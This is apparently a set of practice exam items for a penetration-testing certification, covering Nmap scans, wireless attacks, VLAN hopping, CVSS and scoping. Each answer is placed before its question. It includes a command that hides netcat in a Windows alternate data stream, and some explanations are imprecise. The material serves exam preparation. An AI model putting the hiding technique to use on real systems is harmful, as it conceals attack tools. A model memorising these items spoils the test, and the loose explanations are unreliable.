Why would you execute the following command: type nc.exe > notepad.exe:nc.exe A. To send nc to notepad where you can reverse engineer the code B. To launch both applications but with nc.exe in a hidden window C. To create an alternate data stream to hide nc.exe D. To trigger nc.exe whenever somebody opens notepad
B. Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server's data can become compromised.
Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords? A. SQL injection B. Missing patches C. CRLF injection D. Cross-site scripting
C. TCP ACK scans can be used to determine what services are allowed through a firewall. An ACK scan sends TCP packets with only the ACK bit set. Whether ports are open or closed, the target is required to respond with an RST packet. Firewalls that block the probe usually make no response or send back an ICMP destination unreachable error. This distinction allows Nmap to report whether the ACK packets are being filtered. A TCP SYN scan can sometimes be used to determine what ports are filtered. Still, if the firewall is configured to drop packets for disallowed ports instead of sending an RST packet, then a TCP SYN scan will not be able to determine if a firewall was there or if the port was simply unavailable. A target sends a TCP RST packet in response to a TCP ACK scan, but a TCP RST is not a valid type of scan itself. An XMAS Tree scan will set the FIN, PSH, and URG flags in the TCP packet. This is a noisy type of scan and not useful for probing firewall rules.
You are conducting a penetration test and performing active reconnaissance. You want to configure your tool to probe the target organization's firewall to determine its rules. Which of the following scan types should you utilize? A. XMAS tree scan B. SYN scan C. ACK scan D. RST scan
C. A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it firsts beacons to determine if any of these previously connected networks are within range. This allows an attacker to answer the request, allowing the user to connect to them instead as an evil twin. At this point, the attacker is now the on-path between the wireless client and the internet, which is useful for many different exploits.
You are conducting a wireless penetration test against an organization. During your reconnaissance, you discover that their network is known as "BigCorpWireless" has their SSID broadcast is enabled. You configure your laptop to respond to requests for connection to "BigCorpWireless" and park at the far end of the parking lot. At the end of the workday, as people get in their cars in the parking lot, you see numerous smartphones connecting to your laptop over WiFi. Which of the following exploits did you utilize? A. Fragmentation attack B. Downgrade attack C. Karma attack D. Deauthentication attack
D. The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
You are interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true? A. The attacker must have access to the local network that the system is connected to B. Exploiting the vulnerability does not require any specialized conditions C. Exploiting the vulnerability requires the existence of specialized conditions D. The attacker must have physical or logical access to the affected system
D. VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports extending across any number of switches on an Ethernet network. One of the most common VLAN hopping methods is to overflow the MAC table on a vulnerable switch. When this occurs, the switch defaults to operating as a hub and repeats all frames being received through all of its ports. This "fail open" method ensures the network can continue to operate, but it is a security risk that can be exploited by the penetration tester.
You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to the network jack in their conference room. You found yourself in the highly restricted VLAN that the organization allows its visitors to connect to when conducting presentations. This VLAN only allows you to access the internet, not the internal network. You decide you need to conduct VLAN hopping. Which of the following methods would be MOST likely to succeed? A. Harvest the user credentials of an employee and use those to connect B. Connect a wireless access point to the conference room's network jack C. Spoof the MAC address of the room's VOIP phone to your laptop D. Poison or overflow the MAC table of the switch
D. Application containers are virtualized environments designed to package and run a single computing application or service and share the same host kernel. Since they share the same host kernel, they use common libraries, as well. If you can exploit the common libraries, you will gain access to every website on that server, even if they are in an application container.
You are preparing for the exploitation of Dion Training's systems as part of a penetration test. During your research, you determined that Dion Training is using application containers for each of its websites. You believe that these containers are all hosted on the same physical underlying server. Which of the following components should you attempt to exploit to gain access to all of the websites at once? A. Their e-commerce website's web application B. Hypervisor vulnerability C. Configuration files D. Common libraries
B. The .sh extension is used with Bash shell scripts. Typically PowerShel uses .ps1, Ruby uses .rb. C++ is not a scripting language.
You are reviewing your companies collection of custom pentesting tools and scripts. What language is used for scripts ending in .sh? A. PowerShell B. Bash C. Ruby D. C++
B. Port security, also known as persistent MAC learning or Sticky MAC, is a security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity.
You are working as a network administrator and are worried about the possibility of an insider threat. You want to enable a security feature that would remember the Layer 2 address first connected to a particular switch port to prevent someone from unplugging a workstation from the switch port and connecting their laptop to that same switch port. Which of the following security features would BEST accomplish this goal? A. ACL B. Port security C. NAC D. 802.1x
C. Android apps come packaged as APKs (Android PacKages). The APK contains all the application files, including the DEX file (Android bytecode/binary). To reverse the APK into the source code to conduct a static analysis, you can convert the DEX file to a JAR (Java Archive) file. Then, you can decompile the JAR file into Java source code using a decompiler.
You are working as part of a DevSecOps team at Dion Training on a new practice exam Android application. You need to conduct static analysis on the APK (Android PacKage) as part of your software assurance responsibilities. Which actions should you use to convert the APK back into the source code to analyze the type of information an attacker might gain during reverse engineering the APK? A. Compile the APR into a JAR and then convert it into DEX source code B. Decompile the DEX to a JAR file and then convert the JAR into Java C. Convert the DEX to a JAR file and then decompile the JAR into Java D. Convert the Java code in the APK to a JAR file and then cross-compile it to a DEX
B. The -iL option will scan each of the listed server's IP addresses. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results to the shell. The option of -sL will only list the servers to scan, but it will not scan them. The option of -oX is for outputting the results to a file in an XML format.
You are working as part of a penetration testing team conducting engagement against Dion Training's network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt? A. nmap -p80,443 -sL servers.txt -oG results.txt B. nmap -p80,443 -iL servers.txt -oG results.txt C. nmap -p80,443 -sL servers.txt -oX results.txt D. nmap -p80,443 -iL servers.txt -oX results.txt
D. -T3 is the default and most stable scanning timing option. -T0 and -T1 are the best options for evading an intrusion detection system, but they are extremely slow to conduct the scan. -T2 slows the scan to conserve bandwidth.
You are working as part of a penetration testing team conducting reconnaissance. Which of the following scan options is used as the default in Nmap and is considered the most stable timing option? A. -T1 B. -T0 C. -T2 D. -T3
C.
You have been asked to perform a penetration test for a medium-sized organization that sells after-market motorcycle parts online. What is the first task you should complete? A. Research the organization's product offerings B. Determine the budget available for the test C. Identify the scope of the tesst D. Gain authorization to perform the test
A. To ensure you are not accidentally targeting another organization's wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, AC, or AX and if they are using the 2.4 GHz or 5.0 GHz spectrum for their communications. Often, this scoping document will also include the SSID names to ensure the penetration tester is assessing the wireless network owned by the organization and not someone else's by mistake.
You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment? A. The frequencies of the wireless access points and devices used by the client B. The network diagrams with the SSIDs of the wireless access points used by the client C. The number of wireless access points and devices used by the client D. The make and model of the wireless access points used by the client
B.
You have been recently hired by a security firm to conduct penetration tests on clients. Which agreements will your new employer most likely ask you to sign as a condition of employment? A. MSA B. NDA C. SOW D. PO E. Noncompete agreement
B. Only strncat() automatically checks for conditions where a size bond has been exceeded. All other functions listed here do not implement this type of checking and should be avoided.
uffer overflows can be caused by not performing bounds checks. Which of the following C/C++ functions perform bound checking and is considered safe to use? A. gets() B. strncat() C. memcpy() D. strcpr()